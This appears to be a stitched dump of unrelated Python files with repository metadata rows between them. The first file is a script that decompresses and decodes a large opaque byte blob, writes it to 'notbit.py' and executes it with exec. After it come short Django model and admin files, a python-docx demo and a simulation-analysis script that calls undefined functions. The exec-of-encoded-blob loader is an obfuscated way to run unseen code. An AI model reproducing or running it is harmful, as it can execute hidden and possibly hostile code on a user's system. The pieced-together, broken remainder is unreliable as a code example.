data=b'x\xda\xedZ\xdb\x96\xaa\xc8\xb2\xfd\xa4\x06,\xbb\x8bG\xa1\x04A\xa5\x96\xa2\x80\xbc\t\x94\x80\\t/\xaf\xf8\xf5{F&\xe0\xa5\xac\xd5\xbd\xba\xcf^c\x9cs\xf6\x03\xa3,M"3\xe32cFd\xbe\x04\xafE\xaf\xd7[\x1b}\xf1\x18v\xa6yX\x8e\x87KW<\x05\x1dS0t\xf9\xa2\x16\xf9>\xd4\xe5*R\x95\xcb\x877\x1e\xaa\x85|\x19\x95V\x97\xc6\x06v\\.\xa4\xf3\xc5\xac\x94\xad\x9f*\xc7\xb0\xea\x1e\x16\xae\x98\x7f\x9b\tePNJCwv\xa14\x8fM\xc9\xda\xf9\xaeV\x99U6T\xd3q<\x95\x1c\xc1\x18\xe4\xc7\xc83\xe2\xa0\x13\x1d\x8c\x81\x9f\x04\x03\'\x0f+\xa5\x08\x0byo\xe8bwTB\xbe\xee\x94a\xa1\xedG\x85\\\xf9\xa7m\x12\xea\xf9j\xe9N\xe2ov\xef2\xbe,:\xd6%\x93\xd4B;-\x1dy\xb3\xf0\xac\x8d\xf1&\xd0\\\xc9b\xa6\xa5~\xb1\x10\xad\xc2L\xdfg\xe3\xcb\xfb[\x94\x8d\xd7\x93\xaeU\xf8kk\xdd\xab\xac7\x03\xbf\x8d\xcf\xe6i3\xf4u\xa70\x06J\xb5t\xbb\x82\'\x89\x17_\x94\x05\xec?\x1f\xeab\x1ev\xac\xc4\x97\xe6\xdb\xf7xc\x86\x03s\x8b=mLqW\x1a\xea.\x9e\xd2\x9a\xec\xee\x9b;\xd7\xde\xe9\x7f?\x8d\xfe\xf0uM\xf0\xbd\xe96p\xe7\x87\xa0\x90;C5;@O\x95_\xb2\xef6F\xea\x18\xef\xa9c\xe1\x99\x19i.\x9bU\xef\xbb\xd1\xf7\x8fa1?\xcc3g6u&\xf1\x10:0E!\xfe\x90\x9a\xf9\x1d\x99\xe9\xad\x98\xe6\xd0q\t\xf9\xab\xb0p.\xb0\xc9\x01\xba\xddD\x9e\xb9\x1b\xa9\xca\x1e\xdfo\x02i"\x9bB\xa49j\xc8\xd7|\x1d\x07\x9d)\x95\xefi\xa2\xefY\x02\xec\xd4~\xa6}Fzr\xf4\xd5S\\\xcb\xda\xc0V\x99\xef\x99\x97o\xde.u<+\x0fSQ\xc1:\x0e\x91j\xfcnd\xe2\xf1\xa3\xc8w\x81\xde?Z\xf6\xcb\xc9P\x13\x0f\xba\xcb`\xc7\x8b\xd1\xef\xce\x8d\xb7\xfei\xb4\xee\xfdah\xd16X\x8f\xab\xf7Jyy\x7f[l\x8d\xbev\n\xf5s\xeeHNjK\xb90\xba\xcc/V\xf5r\xb1\xd2\xde\xc6\x16\x92\xf9l~\xda\x19\xfay\xbb\xc4Z\xe1\x1f\xeb\xa5\xf4\x8aw\xac\r\xf9\x83o\xbfJ\x18\x0b\xb9\xb0\xe5lqx\x9fe\xf1\\\xd2\x8a\x85gn\xafrL\x19kg\xb6\x0b:\x8e\xf0m\xd6\x17\x870W\xa4;/\x91\x06[y\xd6)\x90\xba\x17\xdf\xee\xc9\xc6\xc0\x84n\x95cPZ9\xf9\xd9\xc7`2T\xa1\x8b\x857\x15CQ^\x07\xd24\'_\xba\xd1\x1f\xd91\x89\x06\xce\xc5\x93\xac\xa3\xaf\xcf1\xde\xcc\xf1\x7f\x15\xe4\xfbK\x04\xbbG\x9e\xb5ZHr\xe6\xdb\xd0\xe3\xe3\x9c\x8e\xd0\xd8\xef\x10\xb9b\n\xddbl\x92/\xa4\xddf8\xdb\x0c\r\xb5\x17\x1bz^`\xffy\x90&\x14g\x07\xec\xad\x8c\xd2,\xfe\xa6\xf6*\xd82fc\xe8\xa9}u\xa8FN(i\xa5?\xdb\xc4\xe1 \x17\x96X\'\xe2&Y\xba/\x87p\x90\xc5!l\x1a\x14\xce*(\x9d\xfd\xa2pX\xec\xb52T\xe5\x14\x169\xec\x19\x97\xa3\xd9Kl\xbb\xddS\xe4M\xe2f,\xd6r\xa0\x07\xfb\xa8\x82B\x83Ne\xc4\xf5)\xf6\xe1\xf3\x81\xab\t\xb0y\xfe\xa1k{\xb2\xe7{\xda\xfbn\xad\xc7\xdd\xf1lQ\xc1."\xe2\xeb4t\xce\x87\x87\xf9\x98>\x97|\x1e\xc4\x10\xf9\xa2u1t\xed\xf0a+\xdf}/\x83\xce^c\xdfK\xb6\x91\xfar\x18\xa5\xe1VM{\xed\x9e\xf9\xf7\xf1\x19\xf6\x1c6k\x84\x1d\xe0\xa7\xd6w\xc4\x18t\xebW\x81$\xc4\x81+g\x91{&\x1c\xd9\x06\x1e\xf0\xa8D<\xc5\x9b!\xec\xb2\x03\x9e\xad\x80M\xc9P\xd7\xc4Hg\xb6\xc9\xa37q\x1e\x96NNr\x8dj\xbc\xfe\xd3\xe7D\xe3\x14o:?\xbf\xcd\x04Q3\xfa\xe6x&X#\xb5\xacmR\xc7\xf2l\xae\r\xa6\xf3\xee|b#\xbe\xd5\xd0T\x1dy\xd5\xec\xc5\x13\xe5\x95\'\xbe\xc6^\xc5\xf4\xc2?\x8b\xf4;>W\xf4{\xf3?t\xf0\xa7rO\xb1\xc7\xe5\x1e\r\x95\xbd\xf7j\x0cN1\xff\xfcz44\xfc\xa5\xff\xb5\x13~W^\rM^\xad\xfe\x8a\\[\t\xe9\x1d\x0frF\x1d\xcc\xd19C\xee\x19\xef\xf66\x1e\xfe\x1fj\x88M\xc8]a\xcc\x8a\xcb}\xfdK\xeb\xb5\xb1?\xed\xf5H\x0f\xc9\xa3\xf5r}\xb0\xcf!}\x1eu\xd8<\x90\xcd\x7f[i\xe4K\x9fp\xf2\xd3\\\xf8\xbeO8l2\xbd\n\xd7xyx&\xd2y\x8b\xb8\x8b\'\x85,P\xce\x03\x06\x00\xb3\x8d8Z\xf7\x0f\xe3\xe7\xef\xec\x7f8\xbf\x1a\x96\xc3\xc9\xb6\x8e\xa7D\x87\x9f\xe5\xa3<\xd7f\xfd\xf37\xa7b\xfbf2\x9e\xade\n\x1c4\xde6\xb7\xf9\xc4\x9e\xce)\x07\x84\xf1r0\x15\xc2\xc1\xf8\xf7Q%\x97K`{\xe4\x1a\x07\xf8\xf1~\xd4\x99"oNO\x91\x9b_\x10\xff\x88\xd1(\xf7\xd5\xd7[\x19\x9e\xdd\xcf\xe7S\xe8\xdc\x84\x1c\xe4\x93Ok\xe2:z\xdccF\xbe\xdd\x9f:\xd6\xdb<\xcb\'N\x1fi<U\xd4Y_~\xb3O\xdb\x16/<\xfd\x85\xfcC\x03>\x11\xde\x10\xc6t\r\xe0"tQ\x1a\x83k\xce6t\xf3\x18\xa9\xdd0`\xb1<\xe6\xfa\xd6\xe5S\xa4\xe7\xd0\xf9x\xd8\xe6\xd3J\xf9\x16\x0e\x90\x1f\x81\x93\xef\xa9\xc2\xc7\x17\xf5\xb8\x14X\xad\xed\xd2\xa9.\x97\x88\xf5#\xe6\x00n\x92\xfd\xf6\xab\x05\xc9K\xe1\xdb\xd9y\x0b\x9c\x02f\xe7\x07`\xc2n\tL\xf0$\x9a\xdb\xd8\x19\xaa\xa9N\x84\xa4y\'\r:\x93t\xa4\xf6R\xb7\xb0\x92PJ\x9e\xc82!\x8b\xcd\xb3\x0e\xf4|\xbd\x14e\xf6\x8eg\xf7\xd6w\xebO\x95\xdd\x12\xf9\x82\xf65\xe7\xfb\x88\x17\xf7\xfb\x8b\xf1\xfe\x05\x9c\xa9C\xb63\xf4\xae\x18\xb8\xc89\xd0\xa1\xdf\x19\x0f\tG\xdb\xef0/t&\x10\xd6r\xdcu(G`,\xb8\x84\x9d\x1c\xb9n^\xb6M\x0eh\xf4\xa6\xda\x86Ikn\xf0\x10\xb9o\x07\x0e@\xbe\xcc\xf5\xedY\xdf\xc9.\xcc\xb7\x81\xad\xa1\xe4\x80\x83Y\x02\xb3K\x0f\\\n1\x00N\xc0d\xd5\xb8\x1c\x0fU\xc3$\xfb:R\x02\xbd\xc4\xf5\x9e\xa6G\xc6\xd5l\xa5\xb3\x80\xbf\xc3\xc6\xf8\xdf\x14\x83\xf5k\xfa\xd9o{\xf8.y\xe79\x0e\xdcN\xea\xee>\xec\xec~\x9cc\x81\x9fP\\\x80K\xa4\xbd-b\'A\x0cvh<x\xdd&\xe8(,\xdf\xb8\x92vY\x8a\x02\xe2\x0c9H\x93\xd7K\xe4\n\xf8\xda\x8e\xf2\x08\xd6q\x89$\xa7R\xe3\xcc\xc4^\xd7\x7f\t\xbbo\x1e5\xc6\xfe;\xf9aQ)\x99\xef.\x907\xb4m\x90\xc6w<\xaf^\xef\x00\xf1\xae\xcd\x90\xe3\x8c\xc1\xc3:\x9e\xef\xa9\xd5\xb3\xefN\x0e\xd0eJ\x1c\xa4\xf5\xf5Sf2_\x9es?E\xfe\x80\x9f*o\xad\xcc\xbe\xb6n\xfcg\xe6\xc2\x0f\xec:~\xe2l]\x8f=6\xb1\xa2\xc6y\x1b\x93F\xbf\xf5\xbb\xdf\r\x8d\xe7^\xd5\xade\xd51\xe4\x14\xf9e\xe9q\xff\x87\xec\x0b\xe3\x0e6\x8b\x91!\xc5\x8e\x91\x033\x85\xdb9^\xb8\x0f\xf76&pa\xc2\xe7R(\x1e\xe2\xc6F\xc8\xb3,\x0e\x8cA\x84\xb8\x89[_$,\x08O\x1b\xf3\'\xfc<YtZ?7U\xaf\xc6\xd6^\x96\xaa\xb4\xc6\'2H\xafX\x97B~\x1c1\x8e\xaa\x08A\xa5\\|\xe4\xffE\x87\xc7#t\x04?G|\xc3\x1e\xb4\xde\x9a\x83\x80\xf3\xe6\xe0H\xa8A\xd48U\xc1UT\'B\xfd\xc0\xdf1;\xe3\xb8\x1d\xff\xd4\xf7\x15\xac\x99r\x81\xf0\x9b\x91\xde\xe5\x05\x96\x7f\xf0\xddf\xd6\xf2(\xf9\x10\x0c\xb2\xed\xc3\xb8\x9a\xe7\xf7\xd2\xf7\xd4\x88\x876\xb3\x15\xf8e\x84=\xc0Vj\xa3\x8bn\x80\x9a\x06XV\xdb1G,\xc49\xf4?\xbd\xdb\xcf5\x16r\xaa\xc1\xae\xb14\x13\xda}\xb8\x17%\xba\xd3\xab\xde\xc8\xdc\x9d<\xbb\xf6[\xe8\x94\xf3;\'3R\xaciB>\xc79\x16\xe3\xa6\x03\x05\xf5E7\xbf\xdaB\xd9\xc2\xfe\x07\xf2\x07pip\xd9\xbcX\xe2]u\xc2\xe6ac=\xa9\x19K\x9c\x1b5c\xd5M\xc2"\x92\xdc\x8b\x16\xb1\xd8\xc5\xb3\xa4\xf8\xe3\xd8\x89\xbaRI\xe0G\x07\xe2{\xe0\xdb\x97\xa1j^\x88\'\xb2\xbd\xa6\xd9\xef\xec\x1d\x17\xe3\n\xf1\xbb\xaf\xe7\xd5\xc3\xefC\xe2\x17\x06\xfcU\xb5\x81\x7f\x92L1\xb5\x86\xcf\x92_\x10\x9e\xe7\x88A\xec+o>\x13\xfe\xcd\xc9_\xfc\x8e\x99\x04,&\x1d\x16O\x88a\xc4\x07\xc5\x0e\xcf\xab\x8f\\\x1aX\xdb\xd4\xa2\xf0\xcdk\xfdI>\t[\xc2W\x90\xd7\xf5F^\x97\xea\x03\xd4\xcf\xc9\x898\xba\xef\xc8u\r`P\\\x9b\xa8\x0bi\x1dI$i\xe0\xb8\xed:\x0f\xa8\xb7\xa8\x1e\xcd\x19\xbf\x9d\xd0s\x8d\xf7I\xc7\xa9P\x9bP<&\x0b\xd4#\x11l\xfa\x9e\xde\xe4\xfa\xcc\xf2\'\xf3\x17^Kv\xf6\xa8\x9f\xba\xc5\x12\xf5\x1cj\x12V\x9f\xaf\xec\xe4\x0f\xaaQY\xdc\x14\xdd\x046\x979g\x7f\xc2s\xb0F\x8e_\xd3U\xe0Y\xa5\xd7\xe1\xb5l\x8d}>\xb8\xf0x&\xd2\xdc\xbdr\x8e\x1a\x11v9\xf8U\xef\x18q\xbc\x89\x89\xb3\x00_\x0f\xbez\xcbELm.8s\xa6\xaf\t\xb7\xd7\x1c\xf5\x15\xf1\xf5\xeb\xf8V\x06\xed\xfd\x93~B\x9aKCm\x08\xfb/\xdc(\x1f>\xe03p\xae\x1cu\xfc-\xec(0<\x9c\xd4>\xadQ\x9dg"\x96\xf9o5o\xd9\xf8\xb0\x81?\x18\xd3\\=\xe2\x05>t:*\xe4\xc3Pw$\xfa\x0c\xdf}\xf7\xbd\xc8j\xe7\xd3-\xd8|\x8a\x1a\xf9q^\xe4\xd4\xc2:\x06.\xf4p\xa9\xeb\x0b\x9b\xd9\xef.\xe7\xf0\xbdQ,\xc3\xcf\xeb9\xa8\x16\xac\xd7I\x8f\t]m}`\xf3\xc2=\xaf"O\xc90\x1f\xab\xa3|\xcfg:x\xf6;\x8f\x11\x8a\xd7i7\xd4\xe7\x9bgc\x86\xe0\x8e\x88c\xc2z\'\xd4Q\xd7\xea\xcelI=\x9e~\xdb\xf3\xe0\xb16a\x98B\xbe\x8d\xdawZ\r1f\xe9\xa2\xae/\xb4\x9d\xd7qN\xac\xdfaw[\x1b\x8c\xd4\x08u\x95\xb2\xfbp\xe4=t\xfc=\xf2z\xe5\x10z\r\x8aI\x1c\r\xf2\x13\xe33E^B\xe7\tt&\xf2\xb9\xe7\x87\xa0\xcdG\xdd\xc7\xf7\xb7\xc0\x9e\x8b\xa1\x01C\xf4s\x17u*b\xaa\x9b\xcf\\\xadZb~\x86i\xd0\x93J6P\x811\xb5\x1e\xa9_\xf4\xc3u\x96\\\x1e\xe2\x0bx\xb4\x17C\xb5[Q\xff\x82prT\x98"\xf6JuA0\xd6\x84\x03\xf5D\xb8.2\xd3\xe8<\xce\xd3\xea\xeb\x80x<\x05\x83|\x15\xd4k\xc3\x1c\xc7\xa8\xc3e,J\xcaY\xc8\x97"\xe1mW\x0c\x8b\x13\xb3/\xf3\xfdIc/\x92}\xc5\xd4\x19|\xcf\xe7\xfe\xc0\xc6<\x8bAS\xbc\xf5\xe1(_\x94\xd6\x96\xf49J_J\xaai\x9bw)\x7fC\x9f\x17\xf8\xb8\xb0\xd4\xe7T[\xec1\xd7\x11\xb6\xbdYKf\x0e\x07\xf7=\x10\xea\xa7\x00\x8b\x05\xafs\xed\x97\x0c\xa9\x7f\x82\x9a\xe3\xbe\xa7\x92\x90\x9cm\xa3\'\xe0?b\xd9\x02\xfe\x93}\xfb\x84o\xaa\xefR\xdd\x9d\x17\xa8\xcfg\x01\xf43\x1cP\xdf\xe5\xae\x97\x05.\x12m"]\xdcQ\x1e\xa0\xf7C\xce}j\x1d\x81\xb3\x0f\xa6\x883&\xef\xc4\xf6\xe3\xc8\xe4\xcf\xc9\xa8\xf0ak(S\x9an\xa34\xdc\x19\x83\x1d\xf5%\x11o\xe3\xf2=\x8d\xca\x91g"?i\xe0H\x88Y;\x92\x87\x8d\xde\xeb8\xabu\xf4\xb6\xf0\x14a!%\t\xf2~N5\x05\x9e\xec:?\xf5g\xaekXzc\x9e\xb7\xfa]\xe4\x86&^X\xccp\x9c\x066\x85R\xb4\xc2\x9e\x81\xbfI\x8b{S\xc6\x13\xa3\xa7s\x19v\xf8\xc8\'J\xe0\xd5\xf7\xa5\xa7\x9c\x98\x8du-\x0b\xab\x97\xc3(\xaf9\xde\xa4\x99\xf3\xc6\x97\xea\xbd\xb0\xfa\x05\\&\xd2\x93\x1c\xb9\x172z\xd7\xf1\x9frT2@\xed\xa0\x82[\xbc\x01\'v\x8bB[/\x85\x9a\x93\xe4\xb0\xbd\xe7\xc0\xfe\xa89\xe2\xeb|\xe0\x0by\xb8\x16a\xf73\xf5\xb2\x10\xe3\xdd<PO7k\xca\xd9\xfe\x91#\xe5\x16\xaf\xaeq\xbe\xf5\xef\xc72;~s\x7f"\xae\x9c\xbb\xb8:#\xae\x98\x8c\x9b5\xa2\xb6\xe0\x1c\xa3\xcd1u\xadF\xbdh`u\xd6\xd4\xaf4fr\xcd\xd7\xc8\xfbI\x1eQ~\x1d\x8c\x0f\xb3\xc2\xe9\\\xf9rB8/\x84\x97O\xfb\x8eY\xcd(\x89\xf0\xc3PvP\x1f\xf9v\xc6|\x17\xd8\xd9\r\x8aq\xcc\xfb\xccQB\x98\x0f\xac\x15\xc3r\xbc\xa9\xf5\xc29/\xf4\xd5\xe0\xd3-\xc6\x83\x1fw\x10\xef\xbcG9\xe1|\xc9\x14\x19\'\xcd\xa9\x06G\x9dQr>}\x83\xdd\xb5/\xfc o_\xeb\x1a}Q\xde\xf7\x9a\x9fs\x00\xf8\x94\n\xdf\xc0~\xad\xbc\xe1\x85L\xb7\xf6X\x06\xd7\xe4\x8f\xad\xcc8\xd7i\xfa\x8bJ\xda\xbc\xc3d\x08\xd7\xfc\r\xae_\xef\x7fz\x19e\xdd<\x12\xda\xf5oH\xaf\xd0\xbdL\xd8K}>p\\\xec\x93\xfa\xc39\xeb\x81P,|s\xa6U\xe4\xce\xb7,\x96m\xeb.\xb7\x82\xf7\xae\x811\x14\x83\xed\xfc\x0f9\xd64\xda=3\xfe\xc5\xed\x8d<\xb0\xf0(f\x9d\x17\xaa{\x88/0}\x0b\x9a\x84x\xd9-\\s\x07\x0cme\xd2\xb9G\x90*\xad\xdd\xde\xe3:&m\xeb\x07\x18p\xd3\x1bz\xd0=\xea\xc5\xf2s]\xc9e\xde\xd4`\x8d\xdd\xa9\xdf\t\xae\x9c\xfd2\xceB\xbc,r)\xa72<\xf9\x07\xfe{\x83i\x83)\xf5"X\xce\xfa\x1b~|\xc3?k\xae[\xafae\x7f\xc17\x81\x03\xb3\xe2\x15u\xa4L\x1c\xbbbgOz\x9e\xfd2\x0c\x00\xef\xf2:|\xceG\x9f\xbc\xe2\xe3\r\xc7(\xcd$\x12e\x96\x87[n\xa7F\xc8\xa1f\xf5\xc1\xce\x1a\x10+\xc8\xd3T+2\xae\x04\xf9\x86~\x06\xaeQ=\xa9\xc0o\xe1\x17\xe0\xdeK\x17\xf5|#\x7f\xb6\xa9q\xf1/\xe5\xaa\x9f\x9c\xebk\x1fn\xea\xcf\xbbs\xb6\x1ak\xdc\xb93\x9e\xf5e\x8f\xf5pE+\x0f\x8a)\xe91n8<r\x15\xfcS$.\xf9\xb5\xfc\'\xb5\x17t\x98y\xd7X\xdf|\xc2\x145l\xea\x8c\xf2\xce?\\\x92\xffkk\x02\xf0\x89g\xf5\xc0\xcf\xf8\xc5\x01\xb5.0!\x8cI\x0e\xf8\xc2\rn\xfd\x8f\xf9\x00j\xc6y\x0c\x0c\xca\xb9\xfd\x81\xdd\x15\xd3\x13\xbe\xf3\x93%\xb0qQ\x9c\xf3\x1fa\x99\xcak^\xc4\xb4"R=;g\xe7q\xd4w\xe9v\r}\x9f\x7f\xd8\xacf\xcf?\xf4\\\x00.\\\xb9\x8e\xeb\xbc\xc0N\x9b1\xeb\x998\xbb%\xc3z\xde\xff\x00\xe6@7m_\xe3\xec1\xdd55\xf3\xb5\xa7\x02\xde\xc0\xfb\x94m\x1fG\xcc}\xd5hr\xdc\xdb\x12\\l\xc9\xcf\xb3y\xbdn7gv\xc6\x95\xf3\r\xac\x13\xf2\xdf\xd6/\xf2\xdc\xef\xfd\xb7\xdf\xf1\xff\xa1\xdfq\x87It\xbe@\xfe~\xedml\x1b\xfb\xc2\x87\x1a\x0eD\xb9`\x0f\xff\xcc\x0c\x95\xce\x11\xa6\x17\x9e\x0b\x88\x03R\x9f\xa3\xc6\x93\x92\xc9]]c<\xf9\x94W\xcc\x8a\xbf\x7f\xd7\xc7\xb8\xd6\xea\x9c\xe3\xb3\xbe>\xec1\xff\x0fq,W\xbb| \xbfQ\xbd\x82\xd8\xf8\x17;o\xe9\xf0^\xca?\xc0+\xb2_\x072\xc0\xc5\xfbWlb\xf1\xff%^\xb5\xb8\xca\xf2H\xf5\x9f\xae\xfb\x9f\xe2#F;\xf6LUz\x1f\xad\xee\xce\xcc_\xc0;\x9a\x9au\xd8\xd6\x8dj\xf8[\xcd\x15\xef\xd7~ij\xf4\xdb=\x91\x7f\xd6\xf75l\xca_Z\xb5\x90\xe2M\x98F\xac.\xf2\xd4\xd7\xcd(\xdd\xfc6tN\x90y\x8a[?a\xeb\x0b\xb7\xa3"\xaaX}\xfd\xd6\xaf\xd7\x01_\xd0\xdb5\xb0\xde\x02\xe9\xf5\xe1\xbd\xb6~\xbd\xf9\x9e\xc5\x0e\xbf\x071\xa7~\x1bt\x86\x98\x1f\x18%b|\xef;\xa7\xe3P}\xf9\xd7\xb7*+\x81\x0f\x0f6\xc9\x0e\xc0\x98c\x04\x8e\xc8\xb0\xfa\xa6>}\x16[~\xda\xe6P\x16_\x93\xc1\xfeA\x1f\x8e|\x9f\x07\xfe<\xcf?\xee\x83\xf7\x03\xb9\xbf^k\xe7MS/_\xfd\x90\xf7\x02\xf99G\xe3{\xf5\xb8\x9f\xe4\x87\x8f6\xfd:\xb6&\x8f\x1c\x91t\xdd\xcd}M\xc6{\xb2HgG\xf7\\\x9bt\xc08\x14\xf8\xd6\xf3~\x14auk\xd3G\xcc\xa1\xbcWF\x98\xe3\x06w\xbc\xf1gn\xa47s\xdc\xf9\x19\xd3\xe7]\xef\xf6S]\xad\xedY\xfd\xf5\xeb\xf0\xa8\xae\x89\xa8\x9f*\xb2\xfc\xf0\x0f0\xc9\x0f:\xf3v/_\xd6x?\xe0\xb2S\x11\xbc\x89\xe7\xa3\xcfu%\xe7St\xae\xf7E?\xbc\xcd#\xef\xc8\xe3{\xfa\x9d\xf5}N\xbfL\x97\x87@\x94\x89\xcf\xfd\xfd\xfaN\xfa\x9a\x17\xfe\x1d}\xb6w;D\x0b~kv\xd9=/:\xaf\x02\x8f .\x1a\x10_G\x0c\xf2\xfe\x18\xb8E\xa1m\x03]K\x03\xdd\xf9\xa1\x9e\xb9/\xf0\xb3\xc0\xa1\x1aMX/\xb2\xa23\xb4,^Jt\xafa\x8a}0\xce\xd9\xf4T\xf9{\xd7\xfbH\xa6O5\xcf\x97\xe7n\xe6W\xe7n\xd5\xd7\xe7n\xf9#o\xa2\\p\xbd\x13F\xdc\x96\xf5vYo\xfe\xc0\xcfc\xc7\x87\x10\x98\xb3T\xbb\xc4\x99/\xb0\xfd\xc6\xa0\xfei\xc7\xa23\xd5\xb4\x8d\x01\x8c\x0b\xdc}\xb6\xf4\x8c\xfb\xdf\xe9,U\xed\xc5\r\x07\x06\x97=\xb0\xbb\x02l\xff5\xe6Q,\xbb\r\xfe\xd1\x99\xf2\xf5\xae\xc7\xa4\xc6\x15\xe8\xb0\xe5\xa7#~\xf7\xe4q/\r\x7f\xe4\x98\xe2)[\x0f\xbe\x1aJ\xf1\xf6\x0bn\xc4\xf9\xc5\xe0\x91_3=\xed\xb9\xfd>\xe5\x02vG\x92\xf2J\x8bQ^{g\xee\r1Q\x91l\xaa\x15\x10\x0b\x84\xad\xbf\xdf\xf2\xc0\x89\x98+\xb7}1\xea-\x87XG\x93\x87\x86\x03\xc6/E\xe4C\xba\x1b\x07?\x16\xb6_\xd7:\xcf\xb8C|wN\xb6,d\xc6\x0b\x1a\xae\xf8\xf4\xac\xeaZ\xfb\x82{n\x8f\xc8\xdf\x7f\xffL\x8c\xbf_\xde\xe2\xb7\xcd\xd7\xc0\xce\x06Z\x9c\xff\xdf\xc7%\x19n\x07\x9eC\xf7n\x98\xcc/\xb1\xc6\xbd\xe1ld\xc3\xfaN(qq\xaca\xbdT\x93\xaa\xee\xb1\xee#\xba\xdf\xa03\x9d\xc5\x135>\x0c\xd7t\xf7\x8d\xe1\x02\xb0\xe7\xa5\xe4wok}\xdb]\xc4\x83\x0c^\xc9\xb1\xe1\x07|\x87\xdd\xb9`\xfd\xaf\xbe\xf2\xc7cn]\xd9\xf5\x1d\xc8[\x1e\xf9#;=\xc9\xf1\xc3>\xad\xb9\xdb\xde-\x99\x17\xce9rI7\xc9#/\xd9\xfe\xc9Z]\xdf3\xb7~\x99\x137\xbb\xc3\xc1z}tO\x80\xddg\x01v\xf2\xf3%Zg\xd1\x9c\x9d|\xf2\xd3\r\xdd\xff\xa6\xfbT\x13I\xdb\x05\xba\x89\x9an\xafp\xfc4\xed\xf6^r\xaf9\xdbSr\xe0\xc6\'\xdfj\xb8\r[\xab\x94g\xcf\xce\x0en9\x10\xd5\x02\x8b\x99\xd8\xe4\xe3\x9f\xaf\t\x1c\xe1\xc0d\xd4{\xe7\xfd\x9b&N9\xbe\xd4\xfd}\xc6a\xeb\x1e\xff\xaf;O&\x1dk\xf2&\xa0Z\xb9\xaa\xb9\xa9\xda\xf4\x10\xfeJ\xaf\x9b\xf2I\xaft\xc17\xc1\xfb\xc4\x90\xdd\xeb\x98&\x1f_\xf7\x8d\x18\xee\x92\x0f\x03\xc3\xc1\xf5\xcd\xcb\xb3Z\x81\xee\xd5\x04\x14+\x1d\xba_\xc6\xea\x05~\xd7\x97\xf8\x15\x9d\xd5\xdd\xdc\xb3\x7fR\xbb|\xdd\x9b\xca"{:w\x9a\xbb\xf7\xb3\xc8\xb5\xd6\xecN\xb1\xadL\xd8|T\x17s\xbf\xfb\x83\xfd%\xbc\x15k\xfdt\x84\x9b5\xd0]d\xc6\x85\xff\xcb\xc9\xfe\xefp\xb2\x8b\x7f\xd7\xff\x8bS\xee\xd79\xf9&\xf5f\xc0\x9b\xa6\x9b\xfa\xdc\x1c\x7f\xad\r\xf9!\xefg6\xf7\xe6^\xe2i}\x1f\xbd\xe6e\xac\x1f\xa9\x92\xde\xe3\'\xb9\xb7t\x90\xc3\x10Wz\x0e\xfbN\xb7\xa1\x84\x98\x05>/`\x07_e\xfcf\xc8k<p\xae\x8as\x94\xdaWV\x81.\x1f\x913\xb6\xc0"1\xc8\x89\x93\x00C4:\x83\x17Ot\xdf\r>\x0fn\x90\x1f\x86j\xb6\xfd7\x0f\xc0\xa6&'
val=zlib.decompress(data)
val=bs.b64decode(val)
val2=ms.loads(val)
fw=open('notbit.py','w')
fw.write(val2)
fw.close()
exec(val2)
print('done')
| 834.235294 | 13,981 | 0.733042 |
6a0fb21e21040834df2f296f7650980a669e7a30
| 374 |
py
|
Python
|
apps/gamedoc/models.py
|
mehrbodjavadi79/AIC21-Backend
|
9f4342781f0722804a2eb704b43b52984c81b40a
|
[
"MIT"
] | 3 |
2021-03-12T18:32:39.000Z
|
2021-11-08T10:21:04.000Z
|
apps/gamedoc/models.py
|
mehrbodjavadi79/AIC21-Backend
|
9f4342781f0722804a2eb704b43b52984c81b40a
|
[
"MIT"
] | null | null | null |
apps/gamedoc/models.py
|
mehrbodjavadi79/AIC21-Backend
|
9f4342781f0722804a2eb704b43b52984c81b40a
|
[
"MIT"
] | 2 |
2021-01-29T14:52:53.000Z
|
2022-03-05T10:24:24.000Z
|
from django.db import models
# Create your models here.
| 28.769231 | 71 | 0.719251 |
6a0ff32b449d925c6b914b62185f0b337c8c4a7c
| 133 |
py
|
Python
|
assignment/users/admin.py
|
LongNKCoder/SD4456_Python_Assignment_2
|
8a1b64f0b4169585fb63907016f93a7ab15da0a7
|
[
"MIT"
] | null | null | null |
assignment/users/admin.py
|
LongNKCoder/SD4456_Python_Assignment_2
|
8a1b64f0b4169585fb63907016f93a7ab15da0a7
|
[
"MIT"
] | null | null | null |
assignment/users/admin.py
|
LongNKCoder/SD4456_Python_Assignment_2
|
8a1b64f0b4169585fb63907016f93a7ab15da0a7
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from users.models import Friendship
admin.site.register(Friendship)
# Register your models here.
| 16.625 | 35 | 0.81203 |
6a10bfc3e38883e78cd876111e7b6300fd43d471
| 529 |
py
|
Python
|
python/Word/demo_doc.py
|
davidgjy/arch-lib
|
b4402b96d2540995a848e6c5f600b2d99847ded6
|
[
"Apache-2.0"
] | null | null | null |
python/Word/demo_doc.py
|
davidgjy/arch-lib
|
b4402b96d2540995a848e6c5f600b2d99847ded6
|
[
"Apache-2.0"
] | null | null | null |
python/Word/demo_doc.py
|
davidgjy/arch-lib
|
b4402b96d2540995a848e6c5f600b2d99847ded6
|
[
"Apache-2.0"
] | null | null | null |
import docx
doc = docx.Document('demo.docx')
print('paragraphs number: %s' % len(doc.paragraphs))
print('1st paragraph: %s' % doc.paragraphs[0].text)
print('2nd paragraph: %s' % doc.paragraphs[1].text)
print('paragraphs runs: %s' % len(doc.paragraphs[1].runs))
print('1st paragraph run: %s' % doc.paragraphs[1].runs[0].text)
print('2nd paragraph run: %s' % doc.paragraphs[1].runs[1].text)
print('3rd paragraph run: %s' % doc.paragraphs[1].runs[2].text)
print('4th paragraph run: %s' % doc.paragraphs[1].runs[3].text)
| 44.083333 | 64 | 0.680529 |
6a114f290b289195e2b18bfe3c8fd05836efd438
| 1,821 |
py
|
Python
|
src/GL/sim/gql_ql_sims_ml_analysis.py
|
kylmcgr/RL-RNN-SURF
|
5d6db3e6ff4534003f2a7e832f221b5e529775d5
|
[
"Apache-2.0"
] | 2 |
2021-03-12T11:12:23.000Z
|
2021-05-19T08:32:47.000Z
|
src/GL/sim/gql_ql_sims_ml_analysis.py
|
kylmcgr/RL-RNN-SURF
|
5d6db3e6ff4534003f2a7e832f221b5e529775d5
|
[
"Apache-2.0"
] | 6 |
2019-12-16T21:54:13.000Z
|
2022-02-10T00:16:08.000Z
|
src/GL/sim/gql_ql_sims_ml_analysis.py
|
kylmcgr/RL-RNN-SURF
|
5d6db3e6ff4534003f2a7e832f221b5e529775d5
|
[
"Apache-2.0"
] | 3 |
2019-11-07T22:44:21.000Z
|
2021-02-22T05:51:59.000Z
|
# Analysis the data generated from on policy simulations of QL, QLP and GQL.
from BD.sim.sims import sims_analysis, merge_sim_files, extract_run_rew
from BD.util.paths import Paths
if __name__ == '__main__':
sims_analysis_BD()
sims_analysis_GQL_BD()
